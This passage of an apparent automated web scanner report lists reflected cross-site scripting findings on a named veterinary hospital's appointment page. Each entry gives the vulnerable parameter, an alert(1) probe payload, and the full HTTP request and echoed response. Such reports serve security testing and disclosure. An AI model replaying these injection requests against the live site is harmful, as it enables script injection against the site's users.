address%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:02 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=e4559his7rbov2pr83025uc590; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="email" id="email" type="text" size="40" maxlength="255" value="15a16"><script>alert(1)</script>b7c615c11f4 " />...[SNIP]...
2.100. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [fname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ff1"><script>alert(1)</script>d1a004b4a7d was submitted in the fname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=21ff1"><script>alert(1)</script>d1a004b4a7d &guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:06 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=t6737mmn0l66ej6a3kul5vm5e1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="21ff1"><script>alert(1)</script>d1a004b4a7d " />...[SNIP]...
2.101. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [guid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55bce"><script>alert(1)</script>8c1dce1f08e was submitted in the guid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e &ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:12 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=r124nb41s1ua1s8prghmllc3s0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... i" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e &ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5...[SNIP]...
2.102. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ipaddress parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1dd"><script>alert(1)</script>20291fa6c4c was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c &lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:17 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=if1brsa07fop60oc6nosjdjeb1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c &lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri...[SNIP]...
2.103. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [lname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d0"><script>alert(1)</script>9b9f80a0f40 was submitted in the lname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=f53d0"><script>alert(1)</script>9b9f80a0f40 &optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:21 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=j4ue3fobud9ifr9lluj5v6krc2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="f53d0"><script>alert(1)</script>9b9f80a0f40 " />...[SNIP]...
2.104. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22281"><script>alert(1)</script>d33a2c5892d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d =1 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:56 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d =1" />...[SNIP]...
2.105. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [optin parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e691"><script>alert(1)</script>d26f4a4d140 was submitted in the optin parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140 &other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:26 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=5is2j95h7bmhkpu54r12irmp05; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... ls.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140 &other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fww...[SNIP]...
2.106. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [other parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a872"><script>alert(1)</script>e5865d0001d was submitted in the other parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=7a872"><script>alert(1)</script>e5865d0001d &petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
